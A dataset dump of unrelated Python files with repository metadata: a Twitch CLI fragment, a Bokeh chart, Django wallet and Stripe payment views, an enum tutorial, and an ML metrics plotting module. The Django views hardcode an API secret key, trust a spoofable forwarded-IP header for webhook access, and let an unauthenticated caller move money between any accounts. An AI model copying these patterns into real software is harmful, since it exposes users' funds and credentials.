if "twitch.tv" not in parsed.netloc:
sys.exit("The url {} is invalid.".format(channel))
channel = str(parsed.path).split('/').__getitem__(1)
if twitch.add_channel(channel):
print("Added {} to the list of channels.".format(channel))
else:
print("{} is already in the list of channels.".format(channel))
if args.remove:
for channel in args.remove:
if twitch.remove_channel(channel):
print("Removed {} from the list of channels.".format(channel))
else:
print("{} is not in the list of channels. Nothing removed.".format(channel))
if args.list:
print('Your channels: ' + ', '.join(twitch.channels))
# default action
if args.watch or (not any(vars(args).values()) and WATCH_AS_DEFAULT):
if len(twitch.channels) == 0:
parser.print_help()
print()
print('You have not added any channels yet. Try\n twitch -a [NAME/URL]')
else:
# initialize
watch(query_streams(twitch.channels))
| JosXa/twitch-native-streaming | twitch/twitch.py | twitch.py | py | 4,750 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "os.path.expanduser",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "json.JSONDecodeError",
"line_number": 30,
"usage_type": "name"
},
{
"api_name": "json.dump",
"li... |
37336242441 | from math import pi
import pandas as pd
from bokeh.layouts import gridplot,row
from bokeh.io import output_file, save
from bokeh.palettes import Category20c
from bokeh.plotting import figure
from bokeh.transform import cumsum
from bokeh.palettes import Spectral6
from bokeh.transform import factor_cmap
def chart():
output_file("pie.html")
df = pd.read_csv("maggi.csv")
df2= pd.read_csv("pepsi.csv")
df3= pd.read_csv("cadbury.csv")
locationsm=[loc[0:-4].split(" ") for loc in df['Name']]
locationsp=[loc[0:-4].split(" ") for loc in df2['Name']]
locationsc=[loc[0:-4].split(" ") for loc in df3['Name']]
countc=len(locationsc)
countm=len(locationsm)
countp=len(locationsp)
x = {
'maggi':countm,
'pepsi':countp,
'cadbury':countc
}
data = pd.Series(x).reset_index(name='value').rename(columns={'index':'pwp'})
pwp=data['pwp']
value=data['value']
print(data)
data['angle'] = data['value']/data['value'].sum() * 2*pi
data['color'] = Category20c[len(x)]#['yellow','blue']
p = figure(plot_height=450, title="Pie Chart", toolbar_location=None,
tools="hover", tooltips="@pwp: @value", x_range=(-0.5, 1.0))
p.wedge(x=0, y=1, radius=0.4,
start_angle=cumsum('angle', include_zero=True), end_angle=cumsum('angle'),
line_color="white", fill_color='color', legend='pwp', source=data)
p.axis.axis_label=None
p.axis.visible=False
p.grid.grid_line_color = None
print(data)
p2 = figure(x_range=pwp, plot_height=450, tools="hover" , title="PWP")
p2.vbar(x=pwp, top=value, width=0.9)
grid = row(p,p2)
#grid = gridplot([p, p2], ncols=2, plot_width=350, plot_height=350)
save(grid)
| dj5/Plastic-Waste-Profiling | Profilling tools/chart2.py | chart2.py | py | 1,631 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "bokeh.io.output_file",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv"... |
2738595022 | from django.http import HttpResponse, HttpResponseForbidden
from django.shortcuts import render, redirect, get_object_or_404
from django.db.transaction import atomic, non_atomic_requests
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_POST
from ipaddress import ip_address, ip_network
import json
from django.conf import settings
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from .forms import UserRegistrationForm, CustomAuthForm, BVNForm
from .decorators import verified
from .api import WalletsClient
from .models import *
from cryptography.fernet import Fernet
# Create your views here.
wallet = WalletsClient(secret_key="hfucj5jatq8h", public_key="uvjqzm5xl6bw")
fernet = Fernet(settings.ENCRYPTION_KEY)
def register(request):
form = UserRegistrationForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
new_user = form.save()
messages.success(request, 'Account succesfully created. You can now login')
return redirect('accounts:login')
return render(request, "accounts/register.html", context = {"form":form})
def login_user(request):
form = CustomAuthForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
cd = form.cleaned_data
user = authenticate(request, email = cd['email'], password=cd['password'])
if user is not None:
login(request, user)
return redirect(request.GET.get('next','accounts:dashboard'))
else:
messages.error(request, 'Account does not exist')
return render(request, "accounts/login.html", context = {"form":form})
@login_required
def logout_user(request):
logout(request)
return redirect("accounts:login")
@login_required
@verified
def dashboard(request):
wallet = get_object_or_404(Wallet, user=request.user)
return render(request, "dashboard.html", context={"wallet":wallet})
@login_required
def create_wallet(request):
form = BVNForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
cd = form.cleaned_data
user = request.user
bvn = cd["bvn"]
new_wallet = wallet.create_user_wallet(
first_name= user.first_name,
last_name= user.last_name,
email=user.email,
date_of_birth= user.date_of_birth.strftime('%Y-%m-%d'),
bvn= str(bvn)
)
if new_wallet["response"]["responseCode"] == '200':
user.verified = True
user.save()
Wallet.objects.create(
user = user,
balance = new_wallet["data"]["availableBalance"],
account_name = new_wallet["data"]["accountName"],
account_number = new_wallet["data"]["accountNumber"],
bank = new_wallet["data"]["bank"],
phone_number = new_wallet["data"]["phoneNumber"],
password = fernet.encrypt(new_wallet["data"]["password"].encode())
)
messages.success(request, "Account verified, wallet successfully created")
return redirect("accounts:dashboard")
else:
messages.error(request, new_wallet["response"]["message"])
return render(request, "accounts/bvn.html", context = {"form":form})
def make_transaction(request):
if request.method == 'POST':
try:
sender = request.POST.get('sender')
recipient = request.POST.get('recipient')
amount = request.POST.get('amount')
with transaction.atomic():
sender_obj = Payment.objects.get(user = sender)
sender_obj.amount -= int(amount)
sender_obj.save()
recipient_obj = Payment.objects.get(user = recipient)
recipient_obj.amount += int(amount)
recipient_obj.save()
messages.success(request, 'YOur amount is transfered')
except Exception as e:
print(e)
messages.success(request, 'Something went wrong')
return redirect('/')
return render(request, 'home.html')
@login_required
def logout_user(request):
logout(request)
return redirect("accounts:login")
@csrf_exempt
@require_POST
def webhook(request):
whitelist_ip = "18.158.59.198"
forwarded_for = u'{}'.format(request.META.get('HTTP_X_FORWARDED_FOR'))
client_ip_address = ip_address(forwarded_for)
if client_ip_address != ip_network(whitelist_ip):
return HttpResponseForbidden('Permission denied.')
payload = json.loads(request.body)
try:
if payload['EventType'] == "BankTransferPayout":
pass
elif payload['EventType'] == "BankTransferFunding":
pass
else:
pass
return HttpResponse(status=200)
except:
if payload['TransactionType'] == "credit":
pass
elif payload['TransactionType'] == "debit":
pass
else:
pass
return HttpResponse(status=200)
# khjkjeklkjhgyftdfghjjiuygtfdfhbnbvgfcdxfcgvb
from django.conf import settings
from django.shortcuts import get_object_or_404
from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import RetrieveUpdateAPIView
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
import stripe
from payment.models import Payment
from payment.permissions import (
DoesOrderHaveAddress,
IsOrderPendingWhenCheckout,
IsPaymentByUser,
IsPaymentForOrderNotCompleted,
IsPaymentPending
)
from payment.serializers import CheckoutSerializer, PaymentSerializer
from orders.models import Order
from orders.permissions import IsOrderByBuyerOrAdmin
from payment.tasks import send_payment_success_email_task
stripe.api_key = settings.STRIPE_SECRET_KEY
class PaymentViewSet(ModelViewSet):
"""
CRUD payment for an order
"""
queryset = Payment.objects.all()
serializer_class = PaymentSerializer
permission_classes = [IsPaymentByUser]
def get_queryset(self):
res = super().get_queryset()
user = self.request.user
return res.filter(order__buyer=user)
def get_permissions(self):
if self.action in ('update', 'partial_update', 'destroy'):
self.permission_classes += [IsPaymentPending]
return super().get_permissions()
class CheckoutAPIView(RetrieveUpdateAPIView):
"""
Create, Retrieve, Update billing address, shipping address and payment of an order
"""
queryset = Order.objects.all()
serializer_class = CheckoutSerializer
permission_classes = [IsOrderByBuyerOrAdmin]
def get_permissions(self):
if self.request.method in ('PUT', 'PATCH'):
self.permission_classes += [IsOrderPendingWhenCheckout]
return super().get_permissions()
class StripeCheckoutSessionCreateAPIView(APIView):
"""
Create and return checkout session ID for order payment of type 'Stripe'
"""
permission_classes = (IsPaymentForOrderNotCompleted,
DoesOrderHaveAddress, )
def post(self, request, *args, **kwargs):
order = get_object_or_404(Order, id=self.kwargs.get('order_id'))
order_items = []
for order_item in order.order_items.all():
product = order_item.product
quantity = order_item.quantity
data = {
'price_data': {
'currency': 'usd',
'unit_amount_decimal': product.price,
'product_data': {
'name': product.name,
'description': product.desc,
'images': [f'{settings.BACKEND_DOMAIN}{product.image.url}']
}
},
'quantity': quantity
}
order_items.append(data)
checkout_session = stripe.checkout.Session.create(
payment_method_types=['card'],
line_items=order_items,
metadata={
"order_id": order.id
},
mode='payment',
success_url=settings.PAYMENT_SUCCESS_URL,
cancel_url=settings.PAYMENT_CANCEL_URL
)
return Response({'sessionId': checkout_session['id']}, status=status.HTTP_201_CREATED)
class StripeWebhookAPIView(APIView):
"""
Stripe webhook API view to handle checkout session completed and other events.
"""
def post(self, request, format=None):
payload = request.body
endpoint_secret = settings.STRIPE_WEBHOOK_SECRET
sig_header = request.META['HTTP_STRIPE_SIGNATURE']
event = None
try:
event = stripe.Webhook.construct_event(
payload, sig_header, endpoint_secret)
except ValueError as e:
return Response(status=status.HTTP_400_BAD_REQUEST)
except stripe.error.SignatureVerificationError as e:
return Response(status=status.HTTP_400_BAD_REQUEST)
if event['type'] == 'checkout.session.completed':
session = event['data']['object']
customer_email = session['customer_details']['email']
order_id = session['metadata']['order_id']
print('Payment successfull')
payment = get_object_or_404(Payment, order=order_id)
payment.status = 'C'
payment.save()
order = get_object_or_404(Order, id=order_id)
order.status = 'C'
order.save()
# TODO - Decrease product quantity
send_payment_success_email_task.delay(customer_email)
# Can handle other events here.
return Response(status=status.HTTP_200_OK) | Wizard-Fingerz/GreenPurseBackend | payment/views.py | views.py | py | 10,164 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "api.WalletsClient",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "cryptography.fernet.Fernet",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "django.conf.settings.ENCRYPTION_KEY",
"line_number": 23,
"usage_type": "attribute"
},
{
... |
6275958376 | #!/usr/local/bin/python
# coding: utf-8
"""
в этом файле пример создания собственного перечислимого типа в питоне
так как встроенного механизма нет, перечислимые типы создаются как наследники класса
Enum из модуля enum
"""
import enum
@enum.unique # не пропустит одинаковых значений
class Numbers(enum.IntEnum):
"""
просто именованные константы, которые можно складывать и сравнивать
"""
ZERO = 0
ONE = enum.auto()
TWO = enum.auto()
THREE = enum.auto()
FOUR = enum.auto()
FIVE = enum.auto()
SIX = enum.auto()
SEVEN = enum.auto()
EIGHT = enum.auto()
NINE = enum.auto()
TEN = enum.auto()
# ZEROO = 0 # с декоратором @enum.unique такое не пройдёт, если уже есть ZERO
# ==============================================================================
def main():
"""
пример работы с перечислимым типом
"""
var_one = Numbers.ONE
if var_one in Numbers:
print(
f"var_one = {var_one} является одним из Numbers, его значение: {var_one.value}"
)
var_two = Numbers.TWO
if var_two in Numbers:
print(
f"var_two = {var_two} является одним из Numbers, его значение: {var_two.value}"
)
if var_two > var_one:
print(f"var_two is greater than var_one")
else:
print(f"var_one is greater than var_two wtf???")
print(f"var_one + var_two = {(var_one + var_two)}")
print("вот это - особенность IntEnum, так как ожидалось Numbers.THREE")
var_six = Numbers.SIX
print(f"var_six + 1 is {var_six + 1}")
print(f"Numbers(3) is {Numbers(3)}")
print(f"[overflow] var_six + var_six = {(var_six + var_six)}, тип результата: {type(var_six + var_six)}")
print("Результат математических операций над наследниками IntEnum - это int")
# ===============================================================================
if __name__ == "__main__":
main()
| amtsu/team22 | users/sivanov/lessons/lesson_27_enum/incrementing_intenum.py | incrementing_intenum.py | py | 2,382 | python | ru | code | 5 | github-code | 1 | [
{
"api_name": "enum.IntEnum",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "enum.auto",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "enum.auto",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "enum.auto",
"line_number": ... |
25889695431 | # Custom module to assess performance of ML model
# Author: Rupinder Singh (Oct. 25, 2016)
from __future__ import division
import matplotlib.pyplot as plt
from sklearn.metrics import auc,r2_score
import numpy as np
import pandas as pd
from scipy.stats import sem
from mpl_toolkits.axes_grid1 import make_axes_locatable
from sklearn.metrics import classification_report
import os
def get_model_coef(model,columns,export_fn='./Data/model_coef.csv'):
# Returns coefficient of scikit learn model
# model: scikit model object
# columns: array of strings associated with each coefficient
# export_fn: filename to export csv of coefficients
i = pd.Series(model.intercept_, index=['intercept'])
c = pd.Series(model.coef_[0,:], index=columns)
model_coef = pd.concat([i,c]).sort_values()
model_coef = model_coef[model_coef != 0] #remove zero coef
model_coef.to_csv(export_fn)
return model_coef
def compute_classification_score(model,y_train,X_train,y_test,X_test,event):
y_pred = model.predict(X_test)
target_names = ['no_'+event, event]
print(classification_report(y_test, y_pred, target_names=target_names))
acc_train = model.score(X_train,y_train)
acc_test = model.score(X_test,y_test)
tbl=[['','Train','Test'],
['Incidence','{0:.2f}%'.format(y_train.mean()*100),'{0:.2f}%'.format(y_test.mean()*100)],
['Actual ACC','{0:.2f}'.format(acc_train),'{0:.2f}'.format(acc_test)]]
return tbl
def compute_rsq(y_pred,y_true):
"""
Computes coefficient of determination
Inputs are two numpy arrays
"""
ss_res = sum((y_true - y_pred)**2)
ss_tot = sum((y_true - y_true.mean())**2)
rsq = 1-ss_res/ss_tot
rsq = r2_score(y_true,y_pred)
return rsq
def compute_metrics(y_pred,y_true):
# Function computes metrics using predicted and true labels
ap = (y_true==1).sum() #actual positives
an = (y_true==0).sum() #actual negatives
pp = (y_pred==1).sum() #predicted positives
pn = (y_pred==0).sum() #predicted negatives
tn = ((y_pred==0) & (y_true==0)).sum()
fp = ((y_pred==1) & (y_true==0)).sum()
fn = ((y_pred==0) & (y_true==1)).sum()
tp = ((y_pred==1) & (y_true==1)).sum()
tnr = tn / an
fpr = fp / an
fnr = fn / ap
tpr = tp / ap
pr = tp / pp
ptp = tp/(ap+an)
pfp = fp/(ap+an)
ptn = tn/(ap+an)
pfn = fn/(ap+an)
return tnr,fpr,fnr,tpr,pr,ptp,pfp,ptn,pfn
def model_metrics(model,y_true,X_true,Nsets):
# Function produces metric arrarys that have nth rows and nsplits columns,
# where nth is the number of thresholds used and Nsets is number of test sets created
n=int(y_true.shape[0]/Nsets)
indices = np.random.permutation(y_true.shape[0])
idx = ()
for i in range(0,Nsets):
idx += (indices[i*n:(i+1)*n],)
thL = np.arange(0,1.01,0.01) # list of thresholds
Nrows = len(thL)
tnrL=np.zeros((Nrows,Nsets))
fprL=np.zeros((Nrows,Nsets))
fnrL=np.zeros((Nrows,Nsets))
tprL=np.zeros((Nrows,Nsets))
PrL=np.zeros((Nrows,Nsets))
Ptp=np.zeros((Nrows,Nsets))
Pfp=np.zeros((Nrows,Nsets))
Ptn=np.zeros((Nrows,Nsets))
Pfn=np.zeros((Nrows,Nsets))
n = 0
for idx_n in idx:
yprob = model.predict_proba(X_true.values[idx_n,:]) #issue
m = 0
for th in thL:
y_pred=yprob[:,1]>th
(tnrL[m,n],fprL[m,n],fnrL[m,n],tprL[m,n],PrL[m,n],\
Ptp[m,n],Pfp[m,n],Ptn[m,n],Pfn[m,n])=compute_metrics(y_pred,y_true.values[idx_n])
m+=1
n+=1
PrL[np.isnan(PrL)] = 0 # only needed for this as pp could be 0
return thL,tnrL,fprL,fnrL,tprL,PrL,Ptp,Pfp,Ptn,Pfn
def update_plot_parameters(fnt_sz=14,lbl_sz=16):
plot_parameters = {'font.size': fnt_sz,'text.usetex':True,'axes.titlesize':lbl_sz,
'legend.frameon':True,'legend.framealpha':1,'legend.fontsize':fnt_sz,
'axes.labelsize':lbl_sz,'axes.facecolor':'white','axes.edgecolor':'lightgray',
'axes.linewidth':1.0,'axes.grid':True,
'grid.color':'lightgray','figure.edgecolor':(1,1,1,1),
'xtick.labelsize':fnt_sz,'ytick.labelsize':fnt_sz}
plt.rcParams.update(plot_parameters)
def compute_savings(Ptp,Pfp,parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
# Computes expected cost savings using probability of true-positive (Ptp),
# probability of false-positive (Pfp), probability of successful intervention (eta),
# cost of intervention (Ci), cost of event (Ce), cost of no event (Cne)
Nrows,Nsets = Ptp.shape
eta = parameters['eta']; Ci = parameters['Ci']; Ce = parameters['Ce']; Cne = parameters['Cne']
csL = np.zeros((Nrows,Nsets))
for i in range(0,Nsets):
csL[:,i]=Ptp[:,i]*eta*(Ce-Cne)-(Ptp[:,i]+Pfp[:,i])*Ci
csM=csL.mean(axis=1)
csE=sem(csL,axis=1)*confidence
return csL,csM,csE
def plot_model_metrics(thL,fprL,tprL,PrL,export_fn='./Figures/model_metrics.eps',confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns equal number of test sets
th = 0.5
i=np.where(thL==th)
fm=fprL.mean(axis=1)[i]
tm=tprL.mean(axis=1)[i]
pm=PrL.mean(axis=1)[i]
fe=sem(fprL,axis=1)[i]*confidence
te=sem(tprL,axis=1)[i]*confidence
pe=sem(PrL,axis=1)[i]*confidence
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
for n in range(0,Nsets):
ax.plot(thL,tprL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,fprL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,PrL[:,n],label=None,
linestyle='--',color='grey')
ax.plot(thL,tprL.mean(axis=1),label=r'recall',
linestyle='-',color='black')
ax.plot(thL,fprL.mean(axis=1),label=r'fpr',
linestyle='-',color='black')
ax.plot(thL,PrL.mean(axis=1),label=r'precision',
linestyle='-',color='black')
ax.set_ylabel('rate')
ax.set_xlabel('threshold')
#Annotation Shifts
scalex = 0.03*(np.max(thL)-np.min(thL))
scaley = 0.03*(1-0)
ax.annotate('*',(th,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('*',(th,fm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('*',(th,pm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('recall ($%.2f \pm %.2f$)'%(tm,te),(th-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
ax.annotate('fpr ($%.2f \pm %.2f$)'%(fm,fe),(th-scalex,fm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
ax.annotate('precision ($%.2f \pm %.2f$)'%(pm,pe),(th-scalex,pm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_roc_roi(thL,fprL,tprL,Ptp,Pfp,export_fn='./Figures/roc_savings.eps',parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns equal number of test sets
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,2,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
# ROI
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=parameters)
j=np.argmax(csM)
th = thL[j] #threshold for annotation
for i in range(0,Nsets):
ax[1].plot(thL,csL[:,i],label='TS%i ($%.2f$, $\$%.0f$)'%(i+1,thL[j],csL[j,i]),
linestyle='--',color='grey')
ax[1].plot(thL,csM,label='TSM ($%.2f$, $\$%.0f\pm%.0f$)'%(thL[j],csM[j],csE[j]),
linestyle='-',color='black')
ax[1].axvline(th,linestyle=':',color='gray')
ax[1].legend(loc='lower right')
ax[1].set_ylabel(r'$E(c_{saving})$')
ax[1].set_xlabel(r'Threshold ($E(c_i) = \$%.f$, $\eta = %.2f$)'%(parameters['Ci'],parameters['eta']))
# ROC
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(fprL[:,i], tprL[:,i])
aucM=auc(fprL.mean(axis=1), tprL.mean(axis=1))
aucE=sem(aucL)*confidence
fm=fprL.mean(axis=1)[j]
tm=tprL.mean(axis=1)[j]
fe=sem(fprL,axis=1)[j]*confidence
te=sem(tprL,axis=1)[j]*confidence
for i in range(0,Nsets):
ax[0].plot(fprL[:,i],tprL[:,i],label='TS%i ($%.2f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax[0].plot(fprL.mean(axis=1),tprL.mean(axis=1),label=r'TSM ($%.2f\pm%.2f$)'%(aucM,aucE),
linestyle='-',color='black')
ax[0].legend(loc='lower right')
ax[0].set_ylabel('recall (tpr)')
ax[0].set_xlabel('1-specificity (fpr)')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(1-0)
ax[0].annotate('*',(fm,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax[0].annotate('($%.2f \pm %.2f, %.2f \pm %.2f$)'%(fm,fe,tm,te),(fm-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_prob_roi(thL,Ptp,Pfp,export_fn='./Figure/roc_savings.eps',parameters={'eta':0.55,'Ci':104,'Ce':14393,'Cne':5840},confidence=1.95):
Nrows,Nsets = Ptp.shape #number of columns equal number of test sets
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,2,sharex=True,sharey=False,figsize=[15,8])
cur_axes = plt.gca()
cur_axes.axes.get_xaxis().set_visible(True)
cur_axes.axes.get_yaxis().set_visible(True)
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
# ROI
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=parameters)
j=np.argmax(csM)
th = thL[j] #threshold for annotation
for i in range(0,Nsets):
ax[1].plot(thL,csL[:,i],label='TS%i ($%.2f$, $\$%.0f$)'%(i+1,thL[j],csL[j,i]),
linestyle='--',color='grey')
ax[1].plot(thL,csM,label='TSM ($%.2f$, $\$%.0f\pm%.0f$)'%(thL[j],csM[j],csE[j]),
linestyle='-',color='black')
ax[1].axvline(th,linestyle=':',color='gray')
leg = ax[1].legend(loc='lower right')
ax[1].set_ylabel(r'$E(c_{saving})$')
ax[1].set_xlabel(r'Threshold ($E(c_i) = \$%.f$, $\eta = %.2f$)'%(parameters['Ci'],parameters['eta']))
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(Pfp[:,i], Ptp[:,i])
aucM=auc(Pfp.mean(axis=1), Ptp.mean(axis=1))
aucE=sem(aucL)*confidence
# Probabilites
fm=Pfp.mean(axis=1)[j]
tm=Ptp.mean(axis=1)[j]
fe=sem(Pfp,axis=1)[j]*confidence
te=sem(Ptp,axis=1)[j]*confidence
for i in range(0,Nsets):
ax[0].plot(Pfp[:,i],Ptp[:,i],label='TS%i ($%.3f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax[0].plot(Pfp.mean(axis=1),Ptp.mean(axis=1),label=r'TSM ($%.2f\pm%.3f$)'%(aucM,aucE),
linestyle='-',color='black')
ax[0].legend(loc='lower right')
ax[0].set_ylabel('$p_{tp}$')
ax[0].set_xlabel('$p_{fp}$')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(np.max(Ptp)-np.min(Ptp))
ax[0].annotate('*',(fm,tm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax[0].annotate('($%.2f \pm %.2f, %.3f \pm %.3f$)'%(fm,fe,tm,te),(fm-scalex,tm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def plot_precision_recall(thL,tprL,PrL,export_fn='./Figures/precision_recall.eps',confidence=1.95):
Nrows,Nsets = tprL.shape #number of columns = number of test sets
aucL = np.zeros((Nsets,1))
for i in range(0,Nsets):
aucL[i]=auc(tprL[:,i], PrL[:,i])
aucM=auc(tprL.mean(axis=1), PrL.mean(axis=1))
aucE=sem(aucL)*confidence
aucL=np.nan_to_num(aucL)
aucM=np.nan_to_num(aucM)
aucE=np.nan_to_num(aucE)
th = 0.5 #threshold for annotation
i=np.where(thL==th)
pm=PrL.mean(axis=1)[i]
tm=tprL.mean(axis=1)[i]
pe=sem(PrL,axis=1)[i]*confidence
te=sem(tprL,axis=1)[i]*confidence
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,1,sharex=True,sharey=False,figsize=[15,8])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
for i in range(0,Nsets):
ax.plot(tprL[:,i],PrL[:,i],label='TS%i ($%.2f$)'%(i+1,aucL[i]),
linestyle='--',color='grey')
ax.plot(tprL.mean(axis=1),PrL.mean(axis=1),label=r'TSM ($%.2f\pm%.2f$)'%(aucM,aucE),
linestyle='-',color='black')
ax.legend(loc='upper right')
ax.set_ylabel('precision')
ax.set_xlabel('recall (tpr)')
#Annotation Shifts
scalex = 0.03*(1-0)
scaley = 0.03*(np.max(PrL)-np.min(PrL))
ax.annotate('*',(tm,pm),backgroundcolor='white',fontsize=fnt_sz+10,alpha=0.8)
ax.annotate('($%.2f \pm %.2f, %.2f \pm %.2f$)'%(tm,te,pm,pe),(tm-scalex,pm-scaley),
fontsize=fnt_sz,backgroundcolor='white',alpha=0.8)
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def compute_savings_variation(thL,Ptp,Pfp,parameters={'Ce':14393,'Cne':5840}):
# Varies eta or prob. of success parameter from 0 to 1
# and intervention costs from $0 to %500 to compute the corresponding
# maximum mean cost savings (csM_maxL) and confidence interval (csE_maxL)
# and the threshold at which this occurs (th_maxL)
etaL = np.arange(0,1.01,0.01)
ciL = np.arange(0,400,1)
Nrows = len(ciL)
Ncols = len(etaL)
csM_maxL = np.zeros((Nrows,Ncols))
csE_maxL = np.zeros((Nrows,Ncols))
th_maxL = np.zeros((Nrows,Ncols))
m = 0
for c in ciL:
n = 0
for e in etaL:
params = {'eta':e,'Ci':c,'Ce':parameters['Ce'],'Cne':parameters['Cne']}
csL,csM,csE = compute_savings(Ptp,Pfp,parameters=params)
j=np.argmax(csM)
csM_maxL[m,n] = csM[j]
csE_maxL[m,n] = csE[j]
th_maxL[m,n] = thL[j]
n+=1
m+=1
return etaL,ciL,th_maxL,csM_maxL,csE_maxL
def plot_parameter_space(thL,Ptp,Pfp,export_fn='./Figures/parameter_space.eps',parameters={'Ce':14393,'Cne':5840}):
etaL,ciL,th_maxL,csM_maxL,csE_maxL = compute_savings_variation(thL,Ptp,Pfp,parameters=parameters)
mineta=np.min(etaL)
maxeta=np.max(etaL)
minci=np.min(ciL)
maxci=np.max(ciL)
fnt_sz=14; lbl_sz=16;
update_plot_parameters(fnt_sz=fnt_sz,lbl_sz=lbl_sz)
fig,ax = plt.subplots(1,3,sharex=True,sharey=False,figsize=[15,5])
plt.tight_layout(pad=2, w_pad=5, h_pad=0)
c=ax[0].imshow(th_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[0])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label('Threshold',rotation=270,labelpad=20)
ax[0].set_ylabel(r'$E(c_i)$')
ax[0].set_xlabel(r'$\eta$')
c=ax[1].imshow(csM_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[1])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label(r'$E(c_s)$',rotation=270,labelpad=20)
#ax[1].set_ylabel('E(c_i)')
ax[1].set_xlabel(r'$\eta$')
c=ax[2].imshow(csE_maxL, cmap='gist_stern', interpolation='none', extent=[mineta,maxeta,maxci,minci], aspect='auto')
divider = make_axes_locatable(ax[2])
cax = divider.append_axes("right", size="10%", pad=0.05)
clb=plt.colorbar(c, cax=cax)
clb.set_label(r'$\pm$ 95\% CI',rotation=270,labelpad=20)
#ax[2].set_ylabel('E(c_i)')
ax[2].set_xlabel(r'$\eta$')
directory = os.path.dirname(export_fn) #create directory if it doesn't exist
if not os.path.exists(directory):
os.makedirs(directory)
plt.savefig(export_fn, format='eps', dpi=1000,facecolor=fig.get_facecolor(), edgecolor='none')
def get_intervention_data():
ci_otago = 339.15
eta_otago = 0.35
ci_tai_chi = 104.02
eta_tai_chi = 0.55
ci_stepping_on = 211.38
eta_stepping_on = .31
eta_ci = {'Otago Exercise':(eta_otago,ci_otago),
'Tai Chi':(eta_tai_chi,ci_tai_chi),
'Stepping On':(eta_stepping_on,ci_stepping_on)}
return eta_ci
def plot_parameter_space_contour(thL,Ptp,Pfp,export_fn='./Figures/parameter_space_contour.eps',parameters={'Ce':14393,'Cne':5840}):
